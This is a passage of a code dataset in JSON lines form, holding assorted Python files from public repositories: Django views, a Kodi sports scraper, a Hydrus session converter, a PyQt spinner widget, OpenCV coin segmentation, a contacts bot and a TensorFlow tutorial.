\n \"\"\n year = 2021\n while year <= 2050:\n\n if year % 2==0:\n html += f\"
{str(year)}
\"\n \n year += 1\n\n html+=\"
\"\n \"\"\"\n\n year = 2021\n hasta = range(year,2051)\n\n nombre=\"Bryan\"\n lenguajes=['JavaScript','Python','PHP','C']\n\n return render(request,'index.html', {\n 'title':'Inicio 2', \n 'mi_variable':'Soy un dato que esta en la vista',\n 'nombre':nombre,\n 'lenguajes':lenguajes,\n 'years':hasta\n })\n\ndef hola_mundo(request):\n return render(request,'hola_mundo.html')\n\ndef pagina(request,redirigir = 0):\n\n if redirigir ==1:\n #return redirect('/contacto/bryan/pintado')\n return redirect('contacto',nombre='Bryan',apellido='Pintado')\n\n return render(request,'pagina.html',{\n 'texto':''\n })\n\ndef contacto(request,nombre=\"\",apellido=\"\"):\n html=\"\"\n if nombre and apellido:\n html += \"
El nombre completo es:
\"\n html += f\"
{nombre} {apellido}
\"\n\n return HttpResponse(layout+f\"
Contacto
\"+html)\n\ndef crear_articulo(request):\n articulo = Article(\n title = 'Primer Articulo',\n content = 'Contenido del articulo',\n public = True\n )\n\n articulo.save()\n return HttpResponse(f\"Articulo Creado: {articulo.title}-{articulo.content} \")\n\n ","repo_name":"Bryan9696/Proyecto-Python","sub_path":"22-django/AprendiendoDjango/miapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"20756207073","text":"\"\"\"\nLet A and B be two sequences of n integers each. Given an integer m,\ndescribe an O(n*log(n))-time algorithm for determining if there is an integer a\nin A and integer b in B such that m = a + b.\n\"\"\"\n\n\ndef check_sum(A, B, m):\n h = {}\n\n for a in A: # O(n)\n h.setdefault(m - a, 1)\n\n for b in B: # O(n)\n if h.get(b) == 1:\n return True\n return False\n\nif __name__ == \"__main__\":\n A = [1, 3, 5]\n B = [2, 4, 6]\n m = 7\n\n result = check_sum(A, B, m)\n assert result == True\n","repo_name":"aleksandarbos/solutions-for-data-structures-and-algorithms-in-python","sub_path":"c-12.46.py","file_name":"c-12.46.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"30728860213","text":"\"\"\"\nfaça um programa que simula o lançamento de dois dados n\nvezes e tenha como saída:\n- o número de cada dado\n- a relação entre eles (>, <, =) de cada lançamento\n\"\"\"\n\nfrom random import randint\n\nn = int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n\nwhile n != 2:\n d1 = randint(1, 6)\n d2 = randint(1, 6)\n\n if d1 > d2:\n print(f\"O resultado é {d1} > {d2}.\")\n n= int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n elif d1 < d2:\n print(f\"O resultado é {d1} < {d2}.\")\n n = int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n elif d1 == d2:\n print(f\"O resultado é {d1} = {d2}.\")\n n = int(input(\"Digite 1 para girar os dados ou 2 para sair: \"))\n","repo_name":"SouzaCadu/guppe","sub_path":"Secao_06_Lista_Ex_62e/ex_32.py","file_name":"ex_32.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"17030600107","text":"from genetic import GeneticAlgorithm\nfrom utils.functions import load_instance, overlap, add_dummy_dlo\n\nif __name__ == '__main__':\n INSTANCE = 'test_complete'\n dtos, ars, constants, paws, dlos = load_instance(INSTANCE)\n\n initial_dlos = dlos\n\n # get rid of dtos overlapping with paws and dlos\n filtered_dtos = []\n for dto in dtos:\n skip = False\n for event in paws + dlos:\n if overlap(dto, event):\n skip = True\n break\n if not skip:\n filtered_dtos.append(dto)\n\n dtos = sorted(filtered_dtos, key=lambda dto_: dto_['start_time'])\n dlos = sorted(dlos, key=lambda dlo_: dlo_['start_time'])\n\n # add the dummy variable for the correct\n dlos = add_dummy_dlo(dtos, dlos)\n\n CAPACITY = constants['MEMORY_CAP']\n DOWNLINK_RATE = constants['DOWNLINK_RATE']\n\n for i, ar in enumerate(ars):\n ar['index'] = i\n\n for i, dto in enumerate(dtos):\n dto['priority'] = next((ar['rank'] for ar in ars if ar['id'] == dto['ar_id']), None)\n dto['ar_index'] = next((ar['index'] for ar in ars if ar['id'] == dto['ar_id']), None)\n\n ga = GeneticAlgorithm(CAPACITY, dtos, ars, dlos, DOWNLINK_RATE)\n ga.run()\n ga.print_population()\n ga.plot_fitness_values()\n\n solution = ga.get_best_solution()\n solution.plot_memory()\n\n print(f'Best solution: {solution}')\n","repo_name":"Mala1180/satellites-optimization-algorithms","sub_path":"heuristic/complete_problem.py","file_name":"complete_problem.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"10775516293","text":"import pickle\n\nfrom hydrus.core import HydrusData\nfrom hydrus.core import HydrusSerialisable\nfrom hydrus.core import HydrusTime\n\nfrom hydrus.client.networking import ClientNetworkingSessions\n\nclass NetworkSessionManagerLegacy( HydrusSerialisable.SerialisableBase ):\n \n SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER_LEGACY\n SERIALISABLE_NAME = 'Legacy Session Manager'\n SERIALISABLE_VERSION = 1\n \n SESSION_TIMEOUT = 60 * 60\n \n def __init__( self ):\n \n HydrusSerialisable.SerialisableBase.__init__( self )\n \n self._network_contexts_to_sessions = {}\n \n \n def _GetSerialisableInfo( self ):\n \n serialisable_network_contexts_to_sessions = [ ( network_context.GetSerialisableTuple(), pickle.dumps( session ).hex() ) for ( network_context, session ) in list(self._network_contexts_to_sessions.items()) ]\n \n return serialisable_network_contexts_to_sessions\n \n \n def _InitialiseFromSerialisableInfo( self, serialisable_info ):\n \n serialisable_network_contexts_to_sessions = serialisable_info\n \n for ( serialisable_network_context, pickled_session_hex ) in serialisable_network_contexts_to_sessions:\n \n network_context = HydrusSerialisable.CreateFromSerialisableTuple( serialisable_network_context )\n \n try:\n \n session = pickle.loads( bytes.fromhex( pickled_session_hex ) )\n \n except:\n \n # new version of requests uses a diff format, wew\n \n continue\n \n \n session.cookies.clear_session_cookies()\n \n self._network_contexts_to_sessions[ network_context ] = session\n \n \n \n def GetData( self ):\n \n return self._network_contexts_to_sessions\n \n \nHydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_NETWORK_SESSION_MANAGER_LEGACY ] = NetworkSessionManagerLegacy\n\ndef ConvertLegacyToNewSessions( legacy_session_manager: NetworkSessionManagerLegacy ):\n \n session_containers = []\n \n network_contexts_to_sessions = legacy_session_manager.GetData()\n \n for ( network_context, session ) in network_contexts_to_sessions.items():\n \n session_container_name = HydrusData.GenerateKey().hex()\n \n session_container = ClientNetworkingSessions.NetworkSessionManagerSessionContainer( session_container_name, network_context = network_context, session = session )\n \n session_containers.append( session_container )\n \n \n session_manager = ClientNetworkingSessions.NetworkSessionManager()\n \n session_manager.SetSessionContainers( session_containers, set_all_sessions_dirty = True )\n \n session_manager.SetDirty()\n \n return session_manager\n \n","repo_name":"hydrusnetwork/hydrus","sub_path":"hydrus/client/networking/ClientNetworkingSessionsLegacy.py","file_name":"ClientNetworkingSessionsLegacy.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":1987,"dataset":"github-code","pt":"2"}
+{"seq_id":"22143313821","text":"# -*- coding: UTF-8 -*-\n#\n\n\"\"\"Plugin route actions\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport sys\nimport json\nimport urllib.parse\nimport xbmcgui\nimport xbmcplugin\nfrom . import tsdb, data_utils, cache\nfrom .utils import logger\ntry:\n from typing import Optional, Text, Union, ByteString # pylint: disable=unused-import\nexcept ImportError:\n pass\n\nHANDLE = int(sys.argv[1]) # type: int\n\n\ndef find_show(title):\n # type: (Union[Text, bytes]) -> None\n \"\"\"Find a show by title\"\"\"\n if not isinstance(title, str):\n title = title.decode('utf-8')\n logger.debug('Searching for sports event {}'.format(title))\n search_results = tsdb.search_show(title)\n for search_result in search_results:\n show_name = search_result.get('strLeague')\n list_item = xbmcgui.ListItem(show_name, offscreen=True)\n list_item = data_utils.add_main_show_info(\n list_item, search_result, full_info=False)\n # Below \"url\" is some unique ID string (may be an actual URL to a show page)\n # that is used to get information about a specific league.\n xbmcplugin.addDirectoryItem(\n HANDLE,\n url=str(search_result['idLeague']),\n listitem=list_item,\n isFolder=True\n )\n\n\ndef get_show_id_from_nfo(nfo):\n # type: (Text) -> None\n \"\"\"\n Get show ID by NFO file contents\n\n This function is called first instead of find_show\n if a NFO file is found in a TV show folder.\n\n :param nfo: the contents of a NFO file\n \"\"\"\n if isinstance(nfo, bytes):\n nfo = nfo.decode('utf-8', 'replace')\n logger.debug('Parsing NFO file:\\n{}'.format(nfo))\n parse_result = data_utils.parse_nfo_url(nfo)\n if parse_result:\n if parse_result.provider == 'thesportsdb':\n show_info = tsdb.load_show_info(parse_result.show_id)\n else:\n show_info = None\n if show_info is not None:\n list_item = xbmcgui.ListItem(\n show_info['strLeague'], offscreen=True)\n # \"url\" is some string that unique identifies a league.\n # It may be an actual URL of a TV show page.\n xbmcplugin.addDirectoryItem(\n HANDLE,\n url=str(show_info['idLeague']),\n listitem=list_item,\n isFolder=True\n )\n\n\ndef get_details(show_id):\n # type: (Text) -> None\n \"\"\"Get details about a specific league\"\"\"\n logger.debug('Getting details for league id {}'.format(show_id))\n show_info = tsdb.load_show_info(show_id)\n if show_info is not None:\n list_item = xbmcgui.ListItem(show_info['strLeague'], offscreen=True)\n list_item = data_utils.add_main_show_info(\n list_item, show_info, full_info=True)\n xbmcplugin.setResolvedUrl(HANDLE, True, list_item)\n else:\n xbmcplugin.setResolvedUrl(\n HANDLE, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef get_episode_list(show_ids):\n # type: (Text) -> None\n \"\"\"Get games in a league\"\"\"\n # Kodi has a bug: when a show directory contains an XML NFO file with\n # episodeguide URL, that URL is always passed here regardless of\n # the actual parsing result in get_show_from_nfo()\n # so much of this weird logic is to deal with that\n try:\n all_ids = json.loads(show_ids)\n show_id = all_ids.get('tsdb')\n except (ValueError, AttributeError):\n show_id = str(show_ids)\n if show_id.isdigit():\n logger.error(\n 'using deprecated episodeguide format, this league should be refreshed or rescraped')\n if not show_id:\n raise RuntimeError(\n 'No The SportsDB league id found in episode guide, this league should be refreshed or rescraped')\n elif not show_id.isdigit():\n parsed = False\n parse_result = data_utils.parse_nfo_url(show_id)\n if parse_result:\n if parse_result.provider == 'thesportsdb':\n show_info = tsdb.load_show_info(parse_result.show_id)\n parsed = True\n if not parsed:\n raise RuntimeError(\n 'No SportsDB league id found in episode guide, this league should be refreshed or rescraped')\n logger.debug('Getting event list for sports show id {}'.format(show_id))\n show_info = tsdb.load_show_info(show_id)\n if show_info is not None:\n idLeague = show_info.get('idLeague', 0)\n seasons = show_info.get('seasons')\n if not seasons:\n seasons = show_info['seasons'] = data_utils._add_season_info(\n show_info, None)\n event_list = []\n for season in seasons:\n events = tsdb.load_season_episodes(\n idLeague, season.get('season_name', ''))\n if events:\n ep_num = 1\n for event in events:\n event['strEpisode'] = str(ep_num)\n event['strLeague'] = show_info.get('strLeague', '')\n event_list.append(event)\n encoded_ids = urllib.parse.urlencode(\n {'show_id': idLeague, 'episode_id': event.get('idEvent', 0)})\n list_item = xbmcgui.ListItem(\n event.get('strEvent', ''), offscreen=True)\n list_item = data_utils.add_episode_info(\n list_item, event, full_info=False)\n # Below \"url\" is some unique ID string (may be an actual URL to an episode page)\n # that allows to retrieve information about a specific episode.\n url = urllib.parse.quote(encoded_ids)\n xbmcplugin.addDirectoryItem(\n HANDLE,\n url=url,\n listitem=list_item,\n isFolder=True\n )\n ep_num = ep_num + 1\n show_info['event_list'] = event_list\n cache.cache_show_info(show_info)\n\n\ndef get_episode_details(encoded_ids): # pylint: disable=missing-docstring\n # type: (Text) -> None\n \"\"\"Get details about a specific game\"\"\"\n encoded_ids = urllib.parse.unquote(encoded_ids)\n decoded_ids = dict(urllib.parse.parse_qsl(encoded_ids))\n logger.debug('Getting event details for {}'.format(decoded_ids))\n episode_info = tsdb.load_episode_info(\n decoded_ids['show_id'], decoded_ids['episode_id']\n )\n if episode_info:\n list_item = xbmcgui.ListItem(\n episode_info.get('strEvent', ''), offscreen=True)\n list_item = data_utils.add_episode_info(\n list_item, episode_info, full_info=True)\n xbmcplugin.setResolvedUrl(HANDLE, True, list_item)\n else:\n xbmcplugin.setResolvedUrl(\n HANDLE, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef get_artwork(show_id):\n # type: (Text) -> None\n \"\"\"\n Get available artwork for a show\n\n :param show_id: default unique ID set by setUniqueIDs() method\n \"\"\"\n if not show_id:\n return\n logger.debug('Getting artwork for show ID {}'.format(show_id))\n show_info = tsdb.load_show_info(show_id)\n if show_info is not None:\n list_item = xbmcgui.ListItem(\n show_info.get('strLeague', ''), offscreen=True)\n list_item = data_utils.set_show_artwork(show_info, list_item)\n xbmcplugin.setResolvedUrl(HANDLE, True, list_item)\n else:\n xbmcplugin.setResolvedUrl(\n HANDLE, False, xbmcgui.ListItem(offscreen=True))\n\n\ndef router(paramstring):\n # type: (Text) -> None\n \"\"\"\n Route addon calls\n\n :param paramstring: url-encoded query string\n :raises RuntimeError: on unknown call action\n \"\"\"\n params = dict(urllib.parse.parse_qsl(paramstring))\n logger.debug('Called addon with params: {}'.format(sys.argv))\n if params['action'] == 'find':\n logger.debug('performing find action')\n find_show(params['title'])\n elif params['action'].lower() == 'nfourl':\n logger.debug('performing nfourl action')\n get_show_id_from_nfo(params['nfo'])\n elif params['action'] == 'getdetails':\n logger.debug('performing getdetails action')\n get_details(params['url'])\n elif params['action'] == 'getepisodelist':\n logger.debug('performing getepisodelist action')\n get_episode_list(params['url'])\n elif params['action'] == 'getepisodedetails':\n logger.debug('performing getepisodedetails action')\n get_episode_details(params['url'])\n elif params['action'] == 'getartwork':\n logger.debug('performing getartwork action')\n get_artwork(params.get('id'))\n else:\n raise RuntimeError('Invalid addon call: {}'.format(sys.argv))\n xbmcplugin.endOfDirectory(HANDLE)\n","repo_name":"pkscout/metadata.tvshows.thesportsdb.python","sub_path":"libs/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"14802483956","text":"import sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtWidgets import QSizePolicy\n\n\nclass QProgressIndicator(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n self._angle = 0\n self._timerId = -1\n self._delay = 40\n self._displayedWhenStopped = False\n self._color = QtGui.QColor(Qt.black)\n\n self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.setFocusPolicy(Qt.NoFocus)\n\n def animationDelay(self):\n return self._delay\n\n def isAnimated(self):\n return self._timerId != -1\n\n def isDisplayedWhenStopped(self):\n return self._displayedWhenStopped\n\n def color(self):\n return self._color\n\n def sizeHint(self):\n return QtCore.QSize(20, 20)\n\n def heightForWidth(self, w):\n return w\n\n @pyqtSlot()\n def startAnimation(self):\n self._angle = 0\n\n if self._timerId == -1:\n self._timerId = self.startTimer(self._delay)\n\n @pyqtSlot()\n def stopAnimation(self):\n if self._timerId != -1:\n self.killTimer(self._timerId)\n\n self._timerId = -1\n\n self.update()\n\n @pyqtSlot(int)\n def setAnimationDelay(self, delay):\n if self._timerId != -1:\n self.killTimer(self._timerId)\n\n self._delay = delay\n\n if self._timerId != -1:\n self._timerId = self.startTimer(self._delay)\n\n @pyqtSlot(bool)\n def setDisplayedWhenStopped(self, state):\n self._displayedWhenStopped = state\n\n self.update()\n\n @pyqtSlot(QtGui.QColor)\n def setColor(self, color):\n self._color = color\n\n self.update()\n\n def timerEvent(self, event):\n self._angle = (self._angle + 30) % 360\n\n self.update()\n\n def paintEvent(self, event):\n if not self._displayedWhenStopped and not self.isAnimated():\n return\n\n width = min(self.width(), self.height())\n\n p = QPainter(self)\n p.setRenderHint(QPainter.Antialiasing)\n\n outerRadius = int((width-1)*0.5)\n innerRadius = int((width-1)*0.5*0.38)\n\n capsuleHeight = int(outerRadius - innerRadius)\n capsuleWidth = int(capsuleHeight * 0.23 if (width > 32)\n else capsuleHeight * 0.35)\n capsuleRadius = int(capsuleWidth/2)\n\n for i in range(12):\n color = self._color\n color.setAlphaF(1.0 - (i/12.0))\n p.setPen(Qt.NoPen)\n p.setBrush(color)\n p.save()\n p.translate(self.rect().center())\n p.rotate(self._angle - i * 30.0)\n p.drawRoundedRect(-capsuleWidth*0.5,\n -(innerRadius+capsuleHeight),\n capsuleWidth,\n capsuleHeight,\n capsuleRadius,\n capsuleRadius)\n p.restore()\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n mw = QtWidgets.QMainWindow()\n\n pi = QProgressIndicator()\n\n frame = QtWidgets.QFrame()\n\n vbl = QtWidgets.QVBoxLayout()\n\n startPb = QtWidgets.QPushButton(\"start spin\")\n startPb.clicked.connect(pi.startAnimation)\n\n stopPb = QtWidgets.QPushButton(\"stop spin\")\n stopPb.clicked.connect(pi.stopAnimation)\n\n delaySlider = QtWidgets.QSlider()\n delaySlider.setRange(0, 100)\n delaySlider.setValue(pi.animationDelay())\n delaySlider.setOrientation(Qt.Horizontal)\n delaySlider.valueChanged.connect(pi.setAnimationDelay)\n\n vbl.addWidget(startPb)\n vbl.addWidget(stopPb)\n vbl.addWidget(delaySlider)\n\n hbl = QtWidgets.QHBoxLayout(frame)\n hbl.addWidget(pi)\n hbl.addLayout(vbl)\n\n pi.startAnimation()\n\n mw.setCentralWidget(frame)\n\n mw.show()\n sys.exit(app.exec_())\n","repo_name":"dnaga392/QProgressIndicator","sub_path":"qprogressindicator.py","file_name":"qprogressindicator.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"74312500207","text":"import unittest\nimport random\nimport os\nimport box\n\n\nclass TestBox(unittest.TestCase):\n def test_boxplot(self):\n rand1 = [random.randint(0, 10) for i in range(10)]\n rand2 = [random.randint(0, 10) for i in range(10)]\n rand3 = [random.randint(0, 10) for i in range(10)]\n data = [[rand1, rand2, rand3]]\n meta = ['rand1', 'rand2', 'rand3']\n title = ['Random Number Distribution']\n box.boxplot(data, meta, 'Random Numbers', title, 'rand.png')\n self.assertTrue(os.path.exists('rand.png'))\n os.remove('rand.png')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cu-swe4s-fall-2019/workflow-rymo1354","sub_path":"test_box.py","file_name":"test_box.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"10003567087","text":"\"\"\"\nProject: Farnsworth\n\nAuthor: Karandeep Singh Nagra\n\nURLs for legacy Kingman site.\n\"\"\"\n\n\nfrom django.conf.urls import url\n\nfrom legacy import views\n\n\nurlpatterns = [\n url(r'^legacy/notes/$', views.legacy_notes_view, name='notes'),\n url(r'^legacy/events/$', views.legacy_events_view, name='events'),\n url(r'^legacy/(?P[-\\w]+)/$', views.legacy_requests_view,\n name='requests'),\n]\n","repo_name":"knagra/farnsworth","sub_path":"legacy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"}
+{"seq_id":"12999134944","text":"import cv2 as cv\nimport numpy as np\n\nfrom scipy.ndimage import label\nfrom cv04.cv04 import img_read\nfrom cv07.cv07 import find_mass_center\nfrom cv3.cv3 import show_img\n\n\ndef main():\n img = img_read(\"cv10_mince.jpg\")\n gray = cv.cvtColor(img, cv.COLOR_RGB2GRAY)\n filterSize = (12, 12)\n kernel = cv.getStructuringElement(cv.MORPH_RECT, filterSize)\n\n gray = gray - cv.morphologyEx(gray, cv.MORPH_TOPHAT, kernel)\n gray = gray - cv.morphologyEx(gray, cv.MORPH_TOPHAT, kernel)\n show_img(gray, \"gray\")\n\n ret, thresh = cv.threshold(gray, 0, 255, cv.THRESH_BINARY_INV + cv.THRESH_OTSU)\n kernel = np.ones((3, 3))\n thresh = cv.erode(cv.dilate(thresh, kernel, iterations=5), kernel, iterations=5)\n show_img(thresh, \"thresh\")\n # noise removal\n kernel = np.ones((3, 3), np.uint8)\n opening = cv.morphologyEx(thresh, cv.MORPH_OPEN, kernel, iterations=2)\n # sure background area\n sure_bg = cv.dilate(opening, kernel, iterations=3)\n # Finding sure foreground area\n dist_transform = cv.distanceTransform(opening, cv.DIST_L2, 5)\n ret, sure_fg = cv.threshold(dist_transform, 0.7 * dist_transform.max(), 255, 0)\n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv.subtract(sure_bg, sure_fg)\n\n # Marker labelling\n ret, markers = cv.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers + 1\n # Now, mark the region of unknown with zero\n markers[unknown == 255] = 0\n show_img(markers, \"markers\")\n markers = cv.watershed(img, markers)\n # img[markers == -1] = [255, 0, 0]\n markers[markers < 1] = 0\n show_img(markers)\n m = markers.max()\n c = find_mass_center(markers, range(2, m + 1), img)\n\n show_img(c, \"center\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aliakseikalosha/AllTaskFromTUL","sub_path":"TUL/20212022/UZO/cv10/cv10.py","file_name":"cv10.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"30118394480","text":"from decorators import input_error\nfrom custom_exceptions import (\n MissingName, MissingPhoneNumber, NameCannotBeNumeric, NoData, PhoneNotFound, IncorrectPhoneFormat,\n NoDataFound, DuplicateEntry\n)\n\n\ndef parse_input(user_input):\n if not user_input.strip():\n return None,\n command, *args = user_input.split()\n command = command.lower().strip()\n return command, args\n\n\n@input_error\ndef add_contact(args, contacts):\n if len(args) == 0:\n raise MissingName()\n\n if len(args) == 1:\n name = args[0]\n if name.isdigit():\n raise NameCannotBeNumeric()\n else:\n raise MissingPhoneNumber()\n\n name, phone = args\n\n if name.isdigit():\n raise NameCannotBeNumeric()\n\n if not phone.isdigit() or len(phone) != 10:\n raise IncorrectPhoneFormat()\n\n if name in contacts:\n raise DuplicateEntry()\n\n contacts[name] = phone\n return \"Contact added.\"\n\n\n@input_error\ndef change_contact(args, contacts):\n name, phone = args\n if not phone.isdigit() or len(phone) != 10:\n raise IncorrectPhoneFormat()\n\n if name not in contacts:\n raise PhoneNotFound\n contacts[name] = phone\n return \"Contact updated.\"\n\n\n@input_error\ndef show_phone(args, contacts):\n if not args:\n raise NoData\n name = args[0]\n if name not in contacts:\n raise PhoneNotFound\n return contacts[name]\n\n\n@input_error\ndef show_all(contacts):\n if not contacts:\n raise NoDataFound\n return '\\n'.join(f'{name}: {phone}' for name, phone in contacts.items())\n\n\ndef show_help():\n print(\"\\nInstructions:\")\n print('1. To add a contact, type: add \"name\" \"phone number\"')\n print('2. To change a contact\\'s phone number, type: change \"name\" \"new phone number\"')\n\n\ndef main():\n print(\"Welcome to the assistant bot! Type 'help' to see available commands.\")\n contacts = {}\n while True:\n try:\n user_input = input(\"Enter a command: \")\n if user_input.strip() == \"\":\n print(\"You didn't enter anything.\")\n continue\n\n command, args = parse_input(user_input)\n\n if command in [\"close\", \"exit\"]:\n print(\"Good bye!\")\n break\n elif command == \"help\":\n show_help()\n elif command == \"hello\":\n print(\"How can I help you?\")\n elif command == \"add\":\n print(add_contact(args, contacts))\n elif command == \"change\":\n print(change_contact(args, contacts))\n elif command == \"phone\":\n print(show_phone(args, contacts))\n elif command == \"all\":\n print(show_all(contacts))\n else:\n print(\"Invalid command.\")\n except Exception as e:\n print(f\"An error occurred: {e}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LozytskyiA/goitneo-python-hw-2-group5","sub_path":"help_bot.py","file_name":"help_bot.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71055990767","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport tensorflow as tf\n\n\n# In[2]:\n\n\n# you have to specify the type\nA = tf.placeholder(tf.float32, shape=(5, 5), name='A')\n\n\n# but shape and name are optional\nv = tf.placeholder(tf.float32)\n\n\n# I think this name is more appropriate than 'dot'\nw = tf.matmul(A, v)\n\n\n# In[3]:\n\n\n# similar to Theano, you need to \"feed\" the variables values.\n# In TensorFlow you do the \"actual work\" in a \"session\".\n\nwith tf.Session() as session:\n # the values are fed in via the appropriately named argument \"feed_dict\"\n # v needs to be of shape=(5, 1) not just shape=(5,)\n # it's more like \"real\" matrix multiplication\n output = session.run(w, feed_dict={A: np.random.randn(5, 5), v: np.random.randn(5, 1)})\n\n # what's this output that is returned by the session? let's print it\n print(output, type(output))\n \n # luckily, the output type is just a numpy array. back to safety!\n\n\n# In[4]:\n\n\n# A tf variable can be initialized with a numpy array or a tf array\n# or more correctly, anything that can be turned into a tf tensor\nshape = (2, 2)\nx = tf.Variable(tf.random_normal(shape))\n# x = tf.Variable(np.random.randn(2, 2))\nt = tf.Variable(0) # a scalar\n\n\n# In[5]:\n\n\n# you need to \"initialize\" the variables first\ninit = tf.global_variables_initializer()\n\n\n# In[6]:\n\n\nwith tf.Session() as session:\n out = session.run(init) # and then \"run\" the init operation\n print(out) # it's just None\n\n # eval() in tf is like get_value() in Theano\n print(x.eval()) # the initial value of x\n print(t.eval())\n\n\n# In[8]:\n\n\n# let's now try to find the minimum of a simple cost function like we did in Theano\nu = tf.Variable(20.0)\ncost = u*u + u + 1.0\n\n# One difference between Theano and TensorFlow is that you don't write the updates\n# yourself in TensorFlow. You choose an optimizer that implements the algorithm you want.\n# 0.3 is the learning rate. Documentation lists the params.\ntrain_op = tf.train.GradientDescentOptimizer(0.3).minimize(cost)\n\n\n# In[11]:\n\n\n# let's run a session again\ninit = tf.global_variables_initializer()\nwith tf.Session() as session:\n session.run(init)\n\n # Strangely, while the weight update is automated, the loop itself is not.\n # So we'll just call train_op until convergence.\n # This is useful for us anyway since we want to track the cost function.\n for i in range(12):\n session.run(train_op)\n print(\"i = %d, cost = %.3f, u = %.3f\" % (i, cost.eval(), u.eval()))\n\n\n# In[12]:\n\n\ndef error_rate(p, t):\n return np.mean(p != t)\n\n\n# In[14]:\n\n\nfrom util import get_normalized_data, y2indicator\n\n# step 1: get the data and define all the usual variables\nX, Y = get_normalized_data()\n\nmax_iter = 15\nprint_period = 10\n\nlr = 0.00004\nreg = 0.01\n\nXtrain = X[:-1000,]\nYtrain = Y[:-1000]\nXtest = X[-1000:,]\nYtest = Y[-1000:]\nYtrain_ind = y2indicator(Ytrain)\nYtest_ind = y2indicator(Ytest)\n\nN, D = Xtrain.shape\nbatch_sz = 500\nn_batches = N // batch_sz\n\n# add an extra layer just for fun\nM1 = 300\nM2 = 100\nK = 10\nW1_init = np.random.randn(D, M1) / 28\nb1_init = np.zeros(M1)\nW2_init = np.random.randn(M1, M2) / np.sqrt(M1)\nb2_init = np.zeros(M2)\nW3_init = np.random.randn(M2, K) / np.sqrt(M2)\nb3_init = np.zeros(K)\n\n\n# In[15]:\n\n\n# define variables and expressions\nX = tf.placeholder(tf.float32, shape=(None, D), name='X')\nT = tf.placeholder(tf.float32, shape=(None, K), name='T')\nW1 = tf.Variable(W1_init.astype(np.float32))\nb1 = tf.Variable(b1_init.astype(np.float32))\nW2 = tf.Variable(W2_init.astype(np.float32))\nb2 = tf.Variable(b2_init.astype(np.float32))\nW3 = tf.Variable(W3_init.astype(np.float32))\nb3 = tf.Variable(b3_init.astype(np.float32))\n\n\n# In[16]:\n\n\n# define the model\nZ1 = tf.nn.relu( tf.matmul(X, W1) + b1 )\nZ2 = tf.nn.relu( tf.matmul(Z1, W2) + b2 )\nYish = tf.matmul(Z2, W3) + b3 # remember, the cost function does the softmaxing! weird, right?\n\n\n# In[17]:\n\n\n# softmax_cross_entropy_with_logits take in the \"logits\"\n# if you wanted to know the actual output of the neural net,\n# you could pass \"Yish\" into tf.nn.softmax(logits)\ncost = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(logits=Yish, labels=T))\n\n\n# In[20]:\n\n\n# we choose the optimizer but don't implement the algorithm ourselves\n# let's go with RMSprop, since we just learned about it.\n# it includes momentum!\ntrain_op = tf.train.RMSPropOptimizer(lr, decay=0.99, momentum=0.9).minimize(cost)\n\n# we'll use this to calculate the error rate\npredict_op = tf.argmax(Yish, 1)\n\n\n# In[21]:\n\n\ncosts = []\ninit = tf.global_variables_initializer()\nwith tf.Session() as session:\n session.run(init)\n\n for i in range(max_iter):\n for j in range(n_batches):\n Xbatch = Xtrain[j*batch_sz:(j*batch_sz + batch_sz),]\n Ybatch = Ytrain_ind[j*batch_sz:(j*batch_sz + batch_sz),]\n\n session.run(train_op, feed_dict={X: Xbatch, T: Ybatch})\n if j % print_period == 0:\n test_cost = session.run(cost, feed_dict={X: Xtest, T: Ytest_ind})\n prediction = session.run(predict_op, feed_dict={X: Xtest})\n err = error_rate(prediction, Ytest)\n print(\"Cost / err at iteration i=%d, j=%d: %.3f / %.3f\" % (i, j, 